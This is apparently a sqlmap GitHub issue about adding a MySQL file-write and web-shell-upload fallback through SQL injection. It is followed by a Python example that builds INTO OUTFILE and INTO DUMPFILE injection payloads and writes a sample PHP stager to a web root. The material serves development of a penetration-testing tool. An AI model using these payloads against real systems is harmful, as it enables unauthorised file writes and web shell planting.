Extend file write on MySQL #647

@bdamele

Description

When UNION and stacked queries SQL injection techniques are not supported and the back-end database is MySQL, sqlmap currently cannot upload a file with --file-write.

Conversely, --os-cmd/-shell/-pwn implements 'LINES TERMINATED BY' as its primary technique regardless of which SQL injection technique is detected, and it works.
Nonetheless, if this technique fails and UNION query is not available, sqlmap is unsuccessful.

Solution:

  • Port the 'LINES TERMINATED BY' technique to dbms/mysql/filesystem.py, only as a fall-back to stacked queries and UNION query SQL injection, since the resulting file will have leftover characters at the beginning from the original SQL statement. This is acceptable for a file stager / web shell upload in lib/takeover/web.py, but may not be for a clean --file-write, so notify the user with a warning message.
  • Implement file write / web shell upload with boolean-based, time-based and possibly with error-based payloads too, e.g. 1 AND (SELECT 0xHEX INTO DUMPFILE 'PATH').
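The following is an added example, not code from the issue or from sqlmap itself. It builds the two payload shapes discussed above (the 'LINES TERMINATED BY' suffix for an in-band SELECT, and the proposed 'INTO DUMPFILE' subquery form) and models what MySQL's INTO OUTFILE actually writes, to show where the leftover characters come from and how the "not a clean write" warning could be decided. The vulnerable query, the sample row, the target path and all helper names are assumptions for illustration; whether INTO DUMPFILE is accepted inside a boolean-based subquery on a given MySQL version is not verified here. Any real write also needs the FILE privilege and a path allowed by secure_file_priv.

```python
"""Hypothetical helpers modelling MySQL file-write payloads (not sqlmap code)."""
import binascii
from typing import Iterable, Sequence


def mysql_hex(data: bytes) -> str:
    """Encode bytes as a MySQL 0x... hexadecimal literal, so no quotes are needed in the payload."""
    return "0x" + binascii.hexlify(data).decode("ascii")


def lines_terminated_by_suffix(path: str, content: bytes) -> str:
    """Suffix appended to the injectable SELECT so MySQL writes `content` after each result row.

    This needs neither UNION nor stacked queries: INTO OUTFILE ... LINES TERMINATED BY
    is part of the same SELECT statement the application already runs.
    """
    return f" INTO OUTFILE '{path}' LINES TERMINATED BY {mysql_hex(content)}-- -"


def dumpfile_payload(content: bytes, path: str) -> str:
    """Boolean-based payload shape proposed in the issue: 1 AND (SELECT 0xHEX INTO DUMPFILE 'PATH')."""
    return f"1 AND (SELECT {mysql_hex(content)} INTO DUMPFILE '{path}')"


def simulate_outfile(rows: Iterable[Sequence[object]], terminator: bytes) -> bytes:
    """Toy model of SELECT ... INTO OUTFILE: tab-separated fields per row, then the line terminator.

    Because the terminator follows each row, the original result row ends up in front of
    (and, with several rows, in between copies of) the uploaded content.
    """
    out = bytearray()
    for row in rows:
        out += b"\t".join(str(field).encode() for field in row)
        out += terminator
    return bytes(out)


def leftover_prefix(written: bytes, content: bytes) -> bytes:
    """Bytes that precede the intended content in the written file (empty for a clean write)."""
    idx = written.find(content)
    if idx < 0:
        raise ValueError("content not present in written file")
    return written[:idx]


def write_is_clean(written: bytes, content: bytes) -> bool:
    """True only when the file holds exactly the requested content (what --file-write should promise)."""
    return written == content


if __name__ == "__main__":
    # Constructed sample: an injectable SELECT and the one row it returns (assumed, not real data).
    vulnerable_query = "SELECT id, username FROM users WHERE id=1"
    result_rows = [(1, "admin")]
    target = "/var/www/html/stager.php"          # assumed writable web root
    stager = b"<?php echo 'stager'; ?>\n"        # constructed benign stager body

    injected = vulnerable_query + lines_terminated_by_suffix(target, stager)
    print(injected)
    written = simulate_outfile(result_rows, stager)
    print(repr(written))
    if not write_is_clean(written, stager):
        # This is the warning the issue asks for: fine for a PHP stager (text before <?php is
        # echoed, not executed), not fine for a byte-exact --file-write.
        print("warning: file has %d leftover bytes before content: %r"
              % (len(leftover_prefix(written, stager)), leftover_prefix(written, stager)))

    print(dumpfile_payload(stager, target))
```

When the SELECT returns more than one row the model shows the content repeated once per row, so the injected statement should be constrained to a single row before the suffix is appended.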
